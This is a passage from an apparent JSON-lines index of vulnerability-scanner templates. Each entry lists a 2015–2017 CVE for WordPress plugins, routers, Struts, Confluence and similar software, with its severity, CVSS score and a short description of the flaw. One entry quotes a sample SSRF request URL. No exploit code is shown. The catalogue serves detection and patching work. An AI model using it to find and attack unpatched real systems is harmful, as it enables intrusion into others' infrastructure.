plugin allows arbitrary file retrieval as it does not check the download path of the requested file.","Classification":{"CVSSScore":"8.6"}},"file_path":"cves/2015/CVE-2015-4694.yaml"} +{"ID":"CVE-2015-5354","Info":{"Name":"Novius OS 5.0.1-elche - Open Redirect","Severity":"medium","Description":"Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2015/CVE-2015-5354.yaml"} +{"ID":"CVE-2015-5461","Info":{"Name":"WordPress StageShow \u003c5.0.9 - Open Redirect","Severity":"medium","Description":"WordPress StageShow plugin before 5.0.9 contains an open redirect vulnerability in the Redirect function in stageshow_redirect.php. A remote attacker can redirect users to arbitrary web sites and conduct phishing attacks via a malicious URL in the url parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-5461.yaml"} +{"ID":"CVE-2015-5469","Info":{"Name":"WordPress MDC YouTube Downloader 2.1.0 - Local File Inclusion","Severity":"high","Description":"WordPress MDC YouTube Downloader 2.1.0 plugin is susceptible to local file inclusion. A remote attacker can read arbitrary files via a full pathname in the file parameter to includes/download.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2015/CVE-2015-5469.yaml"} +{"ID":"CVE-2015-5471","Info":{"Name":"Swim Team \u003c= v1.44.10777 - Local File Inclusion","Severity":"medium","Description":"The program /wp-swimteam/include/user/download.php allows unauthenticated attackers to retrieve arbitrary files from the system.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2015/CVE-2015-5471.yaml"} +{"ID":"CVE-2015-5531","Info":{"Name":"ElasticSearch \u003c1.6.1 - Local File Inclusion","Severity":"high","Description":"ElasticSearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-5531.yaml"} +{"ID":"CVE-2015-5688","Info":{"Name":"Geddy \u003c13.0.8 - Local File Inclusion","Severity":"high","Description":"Geddy prior to version 13.0.8 contains a directory traversal vulnerability in lib/app/index.js that allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-5688.yaml"} +{"ID":"CVE-2015-6477","Info":{"Name":"Nordex NC2 - Cross-Site Scripting","Severity":"medium","Description":"Nordex NC2 contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-6477.yaml"} +{"ID":"CVE-2015-6544","Info":{"Name":"Combodo iTop \u003c2.2.0-2459 - Cross-Site Scripting","Severity":"medium","Description":"Combodo iTop before 2.2.0-2459 contains a cross-site scripting vulnerability in application/dashboard.class.inc.php which allows remote attackers to inject arbitrary web script or HTML via a dashboard title.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2015/CVE-2015-6544.yaml"} +{"ID":"CVE-2015-6920","Info":{"Name":"WordPress sourceAFRICA \u003c=0.1.3 - Cross-Site Scripting","Severity":"medium","Description":"WordPress sourceAFRICA plugin version 0.1.3 contains a cross-site scripting vulnerability.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-6920.yaml"} +{"ID":"CVE-2015-7245","Info":{"Name":"D-Link DVG-N5402SP - Local File Inclusion","Severity":"high","Description":"D-Link DVG-N5402SP is susceptible to local file inclusion in products with firmware W1000CN-00, W1000CN-03, or W2000EN-00. A remote attacker can read sensitive information via a .. (dot dot) in the errorpage parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2015/CVE-2015-7245.yaml"} +{"ID":"CVE-2015-7297","Info":{"Name":"Joomla! Core SQL Injection","Severity":"high","Description":"A SQL injection vulnerability in Joomla! 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-7297.yaml"} +{"ID":"CVE-2015-7377","Info":{"Name":"WordPress Pie-Register \u003c2.0.19 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Pie Register before 2.0.19 contains a reflected cross-site scripting vulnerability in pie-register/pie-register.php which allows remote attackers to inject arbitrary web script or HTML via the invitaion_code parameter in a pie-register page to the default URL.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-7377.yaml"} +{"ID":"CVE-2015-7450","Info":{"Name":"IBM WebSphere Java Object Deserialization - Remote Code Execution","Severity":"critical","Description":"IBM Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default).","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2015/CVE-2015-7450.yaml"} +{"ID":"CVE-2015-7780","Info":{"Name":"ManageEngine Firewall Analyzer \u003c8.0 - Local File Inclusion","Severity":"medium","Description":"ManageEngine Firewall Analyzer before 8.0 is vulnerable to local file inclusion.","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2015/CVE-2015-7780.yaml"} +{"ID":"CVE-2015-7823","Info":{"Name":"Kentico CMS 8.2 - Open Redirect","Severity":"low","Description":"Kentico CMS 8.2 contains an open redirect vulnerability via GetDocLink.ashx with link variable. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-7823.yaml"} +{"ID":"CVE-2015-8349","Info":{"Name":"SourceBans \u003c2.0 - Cross-Site Scripting","Severity":"medium","Description":"SourceBans before 2.0 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2015/CVE-2015-8349.yaml"} +{"ID":"CVE-2015-8399","Info":{"Name":"Atlassian Confluence \u003c5.8.17 - Information Disclosure","Severity":"medium","Description":"Atlassian Confluence before 5.8.17 contains an information disclsoure vulnerability. A remote authenticated user can read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action.","Classification":{"CVSSScore":"4.3"}},"file_path":"cves/2015/CVE-2015-8399.yaml"} +{"ID":"CVE-2015-8813","Info":{"Name":"Umbraco \u003c7.4.0- Server-Side Request Forgery","Severity":"high","Description":"Umbraco before version 7.4.0 contains a server-side request forgery vulnerability in feedproxy.aspx that allows attackers to send arbitrary HTTP GET requests via http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index.","Classification":{"CVSSScore":"8.2"}},"file_path":"cves/2015/CVE-2015-8813.yaml"} +{"ID":"CVE-2015-9414","Info":{"Name":"WordPress Symposium \u003c=15.8.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Symposium through 15.8.1 contains a reflected cross-site scripting vulnerability via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter which allows an attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2015/CVE-2015-9414.yaml"} +{"ID":"CVE-2015-9480","Info":{"Name":"WordPress RobotCPA 5 - Directory Traversal","Severity":"high","Description":"The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2015/CVE-2015-9480.yaml"} +{"ID":"CVE-2016-0957","Info":{"Name":"Adobe AEM Dispatcher \u003c4.15 - Rules Bypass","Severity":"high","Description":"Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2016/CVE-2016-0957.yaml"} +{"ID":"CVE-2016-1000126","Info":{"Name":"WordPress Admin Font Editor \u003c=1.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Admin Font Editor 1.8 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2016/CVE-2016-1000126.yaml"} +{"ID":"CVE-2016-1000127","Info":{"Name":"WordPress AJAX Random Post \u003c=2.00 - Cross-Site Scripting","Severity":"medium","Description":"WordPress AJAX Random Post 2.00 is vulnerable to reflected cross-site scripting.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2016/CVE-2016-1000127.yaml"} +{"ID":"CVE-2016-1000128","Info":{"Name":"WordPress anti-plagiarism \u003c=3.60 - Cross-Site Scripting","Severity":"medium","Description":"WordPress anti-plagiarism 3.6.0 and prior are vulnerable to reflected cross-site scripting.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2016/CVE-2016-1000128.yaml"} +{"ID":"CVE-2016-1000129","Info":{"Name":"WordPress defa-online-image-protector \u003c=3.3 - Cross-Site Scripting","Severity":"medium","Description":"WordPress defa-online-image-protector 3.3 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2016/CVE-2016-1000129.yaml"} +{"ID":"CVE-2016-1000130","Info":{"Name":"WordPress e-search \u003c=1.0 - Cross-Site Scripting","Severity":"medium","Description":"Wordpress plugin e-search 1.0 and before contains a cross-site scripting vulnerability via date_select.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2016/CVE-2016-1000130.yaml"} +{"ID":"CVE-2016-1000131","Info":{"Name":"WordPress e-search \u003c=1.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress e-search 1.0 and before contains a reflected cross-site scripting vulnerability via title_az.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2016/CVE-2016-1000131.yaml"} +{"ID":"CVE-2016-1000132","Info":{"Name":"WordPress enhanced-tooltipglossary 3.2.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress enhanced-tooltipglossary 3.2.8 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2016/CVE-2016-1000132.yaml"} +{"ID":"CVE-2016-1000133","Info":{"Name":"WordPress forget-about-shortcode-buttons 1.1.1 - Cross-Site Scripting","Severity":"medium","Description":"Wordpress plugin forget-about-shortcode-buttons 1.1.1 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2016/CVE-2016-1000133.yaml"} +{"ID":"CVE-2016-1000134","Info":{"Name":"WordPress HDW Video Gallery \u003c=1.2 - Cross-Site Scripting","Severity":"medium","Description":"WordPress HDW Video Gallery 1.2 and before contains a cross-site scripting vulnerability via playlist.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2016/CVE-2016-1000134.yaml"} +{"ID":"CVE-2016-1000135","Info":{"Name":"WordPress HDW Video Gallery \u003c=1.2 - Cross-Site Scripting","Severity":"medium","Description":"WordPress HDW Video Gallery 1.2 and before contains a cross-site scripting vulnerability via mychannel.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2016/CVE-2016-1000135.yaml"} +{"ID":"CVE-2016-1000136","Info":{"Name":"WordPress heat-trackr 1.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress heat-trackr 1.0 contains a cross-site scripting vulnerability via heat-trackr_abtest_add.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2016/CVE-2016-1000136.yaml"} +{"ID":"CVE-2016-1000137","Info":{"Name":"WordPress Hero Maps Pro 2.1.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Hero Maps Pro 2.1.0 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2016/CVE-2016-1000137.yaml"} +{"ID":"CVE-2016-1000138","Info":{"Name":"WordPress Admin Font Editor \u003c=1.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Admin Font Editor plugin indexisto 1.8 and before contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2016/CVE-2016-1000138.yaml"} +{"ID":"CVE-2016-1000139","Info":{"Name":"WordPress Infusionsoft Gravity Forms \u003c=1.5.11 - Cross-Site Scripting","Severity":"medium","Description":"WordPress plugin Infusionsoft 1.5.11 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2016/CVE-2016-1000139.yaml"} +{"ID":"CVE-2016-1000140","Info":{"Name":"WordPress New Year Firework \u003c=1.1.9 - Cross-Site Scripting","Severity":"medium","Description":"WordPress New Year Firework 1.1.9 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2016/CVE-2016-1000140.yaml"} +{"ID":"CVE-2016-1000141","Info":{"Name":"WordPress Page Layout builder v1.9.3 - Cross-Site Scripting","Severity":"medium","Description":"WordPress plugin Page-layout-builder v1.9.3 contains a cross-site scripting vulnerability.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2016/CVE-2016-1000141.yaml"} +{"ID":"CVE-2016-1000142","Info":{"Name":"WordPress MW Font Changer \u003c=4.2.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress MW Font Changer plugin 4.2.5 and before contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2016/CVE-2016-1000142.yaml"} +{"ID":"CVE-2016-1000143","Info":{"Name":"WordPress Photoxhibit 2.1.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Photoxhibit 2.1.8 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2016/CVE-2016-1000143.yaml"} +{"ID":"CVE-2016-1000146","Info":{"Name":"WordPress Pondol Form to Mail \u003c=1.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Pondol Form to Mail 1.1 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2016/CVE-2016-1000146.yaml"} +{"ID":"CVE-2016-1000148","Info":{"Name":"WordPress S3 Video \u003c=0.983 - Cross-Site Scripting","Severity":"medium","Description":"WordPress S3 Video and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2016/CVE-2016-1000148.yaml"} +{"ID":"CVE-2016-1000149","Info":{"Name":"WordPress Simpel Reserveren \u003c=3.5.2 - Cross-Site Scripting","Severity":"medium","Description":"WordPress plugin Simpel Reserveren 3.5.2 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2016/CVE-2016-1000149.yaml"} +{"ID":"CVE-2016-1000152","Info":{"Name":"WordPress Tidio-form \u003c=1.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress tidio-form1.0 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2016/CVE-2016-1000152.yaml"} +{"ID":"CVE-2016-1000153","Info":{"Name":"WordPress Tidio Gallery \u003c=1.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress plugin tidio-gallery v1.1 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2016/CVE-2016-1000153.yaml"} +{"ID":"CVE-2016-1000154","Info":{"Name":"WordPress WHIZZ \u003c=1.0.7 - Cross-Site Scripting","Severity":"medium","Description":"WordPress plugin WHIZZ 1.07 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2016/CVE-2016-1000154.yaml"} +{"ID":"CVE-2016-1000155","Info":{"Name":"WordPress WPSOLR \u003c=8.6 - Cross-Site Scripting","Severity":"medium","Description":"WordPress WPSOLR 8.6 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2016/CVE-2016-1000155.yaml"} +{"ID":"CVE-2016-10033","Info":{"Name":"WordPress PHPMailer \u003c 5.2.18 - Remote Code Execution","Severity":"critical","Description":"WordPress PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted Sender property in isMail transport.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2016/CVE-2016-10033.yaml"} +{"ID":"CVE-2016-10134","Info":{"Name":"Zabbix - SQL Injection","Severity":"critical","Description":"Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php and perform SQL injection attacks.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2016/CVE-2016-10134.yaml"} +{"ID":"CVE-2016-10367","Info":{"Name":"Opsview Monitor Pro - Local File Inclusion","Severity":"high","Description":"Opsview Monitor Pro prior to 5.1.0.162300841, prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch is vulnerable to unauthenticated local file inclusion and can be exploited by issuing a specially crafted HTTP GET request utilizing a simple bypass.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2016/CVE-2016-10367.yaml"} +{"ID":"CVE-2016-10368","Info":{"Name":"Opsview Monitor Pro - Open Redirect","Severity":"medium","Description":"Opsview Monitor Pro before 5.1.0.162300841, before 5.0.2.27475, before 4.6.4.162391051, and 4.5.x without a certain 2016 security patch contains an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via the back parameter to the login URI.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2016/CVE-2016-10368.yaml"} +{"ID":"CVE-2016-10924","Info":{"Name":"Wordpress Zedna eBook download \u003c1.2 - Local File Inclusion","Severity":"high","Description":"Wordpress Zedna eBook download prior to version 1.2 was affected by a filedownload.php local file inclusion vulnerability.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2016/CVE-2016-10924.yaml"} +{"ID":"CVE-2016-10940","Info":{"Name":"WordPress zm-gallery plugin 1.0 SQL Injection","Severity":"high","Description":"zm-gallery plugin 1.0 for WordPress is susceptible to SQL injection via the order parameter.","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2016/CVE-2016-10940.yaml"} +{"ID":"CVE-2016-10956","Info":{"Name":"WordPress Mail Masta 1.0 - Local File Inclusion","Severity":"high","Description":"WordPress Mail Masta 1.0 is susceptible to local file inclusion in count_of_send.php and csvexport.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2016/CVE-2016-10956.yaml"} +{"ID":"CVE-2016-10960","Info":{"Name":"WordPress wSecure Lite \u003c 2.4 - Remote Code Execution","Severity":"high","Description":"WordPress wsecure plugin before 2.4 is susceptible to remote code execution via shell metacharacters in the wsecure-config.php publish parameter.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2016/CVE-2016-10960.yaml"} +{"ID":"CVE-2016-10993","Info":{"Name":"ScoreMe Theme - Cross-Site Scripting","Severity":"medium","Description":"WordPress ScoreMe theme through 2016-04-01 contains a reflected cross-site scripting vulnerability via the s parameter which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2016/CVE-2016-10993.yaml"} +{"ID":"CVE-2016-1555","Info":{"Name":"NETGEAR WNAP320 Access Point Firmware - Remote Command Injection","Severity":"critical","Description":"NETGEAR WNAP320 Access Point Firmware version 2.0.3 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2016/CVE-2016-1555.yaml"} +{"ID":"CVE-2016-2004","Info":{"Name":"HP Data Protector - Arbitrary Command Execution","Severity":"critical","Description":"HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2016/CVE-2016-2004.yaml"} +{"ID":"CVE-2016-2389","Info":{"Name":"SAP xMII 15.0 for SAP NetWeaver 7.4 - Local File Inclusion","Severity":"high","Description":"SAP xMII 15.0 for SAP NetWeaver 7.4 is susceptible to a local file inclusion vulnerability in the GetFileList function. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the path parameter to /Catalog, aka SAP Security Note 2230978.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2016/CVE-2016-2389.yaml"} +{"ID":"CVE-2016-3081","Info":{"Name":"Apache S2-032 Struts - Remote Code Execution","Severity":"high","Description":"Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when dynamic method invocation is enabled, allows remote attackers to execute arbitrary code via method: prefix (related to chained expressions).\n","Classification":{"CVSSScore":"8.1"}},"file_path":"cves/2016/CVE-2016-3081.yaml"} +{"ID":"CVE-2016-3088","Info":{"Name":"Apache ActiveMQ Fileserver - Arbitrary File Write","Severity":"critical","Description":"Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request via the Fileserver web application.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2016/CVE-2016-3088.yaml"} +{"ID":"CVE-2016-3978","Info":{"Name":"Fortinet FortiOS - Open Redirect/Cross-Site Scripting","Severity":"medium","Description":"FortiOS Web User Interface in 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting attacks via the \"redirect\" parameter to \"login.\"","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2016/CVE-2016-3978.yaml"} +{"ID":"CVE-2016-4975","Info":{"Name":"Apache mod_userdir CRLF injection","Severity":"medium","Description":"Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2016/CVE-2016-4975.yaml"} +{"ID":"CVE-2016-4977","Info":{"Name":"Spring Security OAuth2 Remote Command Execution","Severity":"high","Description":"Spring Security OAuth versions 2.0.0 to 2.0.9 and 1.0.0 to 1.0.5 contain a remote command execution vulnerability. When processing authorization requests using the whitelabel views, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote command execution via the crafting of the value for response_type.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2016/CVE-2016-4977.yaml"} +{"ID":"CVE-2016-5649","Info":{"Name":"NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure","Severity":"critical","Description":"NETGEAR DGN2200 / DGND3700 is susceptible to a vulnerability within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2016/CVE-2016-5649.yaml"} +{"ID":"CVE-2016-6277","Info":{"Name":"NETGEAR Routers - Remote Code Execution","Severity":"high","Description":"NETGEAR routers R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly others allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2016/CVE-2016-6277.yaml"} +{"ID":"CVE-2016-6601","Info":{"Name":"ZOHO WebNMS Framework 5.2 and 5.2 SP1 - Directory Traversal","Severity":"high","Description":"Directory traversal vulnerability in the file download functionality in ZOHO WebNMS Framework 5.2 and 5.2 SP1 allows remote attackers to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2016/CVE-2016-6601.yaml"} +{"ID":"CVE-2016-7552","Info":{"Name":"Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass","Severity":"critical","Description":"Trend Micro Threat Discovery Appliance 2.6.1062r1 is vulnerable to a directory traversal vulnerability when processing a session_id cookie, which allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2016/CVE-2016-7552.yaml"} +{"ID":"CVE-2016-7834","Info":{"Name":"Sony IPELA Engine IP Camera - Hardcoded Account","Severity":"high","Description":"Multiple SONY network cameras are vulnerable to sensitive information disclosure via hardcoded credentials.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2016/CVE-2016-7834.yaml"} +{"ID":"CVE-2016-7981","Info":{"Name":"SPIP \u003c3.1.2 - Cross-Site Scripting","Severity":"medium","Description":"SPIP 3.1.2 and earlier contains a cross-site scripting vulnerability in valider_xml.php which allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2016/CVE-2016-7981.yaml"} +{"ID":"CVE-2016-8527","Info":{"Name":"Aruba Airwave \u003c8.2.3.1 - Cross-Site Scripting","Severity":"medium","Description":"Aruba Airwave before version 8.2.3.1 is vulnerable to reflected cross-site scripting.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2016/CVE-2016-8527.yaml"} +{"ID":"CVE-2017-0929","Info":{"Name":"DotNetNuke (DNN) ImageHandler \u003c9.2.0 - Server-Side Request Forgery","Severity":"high","Description":"DotNetNuke (aka DNN) before 9.2.0 suffers from a server-side request forgery vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2017/CVE-2017-0929.yaml"} +{"ID":"CVE-2017-1000028","Info":{"Name":"Oracle GlassFish Server Open Source Edition 4.1 - Local File Inclusion","Severity":"high","Description":"Oracle GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated local file inclusion vulnerabilities that can be exploited by issuing specially crafted HTTP GET requests.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2017/CVE-2017-1000028.yaml"} +{"ID":"CVE-2017-1000029","Info":{"Name":"Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion","Severity":"high","Description":"Oracle GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to unauthenticated local file inclusion vulnerabilities that allow remote attackers to request arbitrary files on the server.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2017/CVE-2017-1000029.yaml"} +{"ID":"CVE-2017-1000170","Info":{"Name":"WordPress Delightful Downloads Jquery File Tree 2.1.5 - Local File Inclusion","Severity":"high","Description":"WordPress Delightful Downloads Jquery File Tree versions 2.1.5 and older are susceptible to local file inclusion vulnerabilities via jqueryFileTree.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2017/CVE-2017-1000170.yaml"} +{"ID":"CVE-2017-1000486","Info":{"Name":"Primetek Primefaces 5.x - Remote Code Execution","Severity":"critical","Description":"Primetek Primefaces 5.x 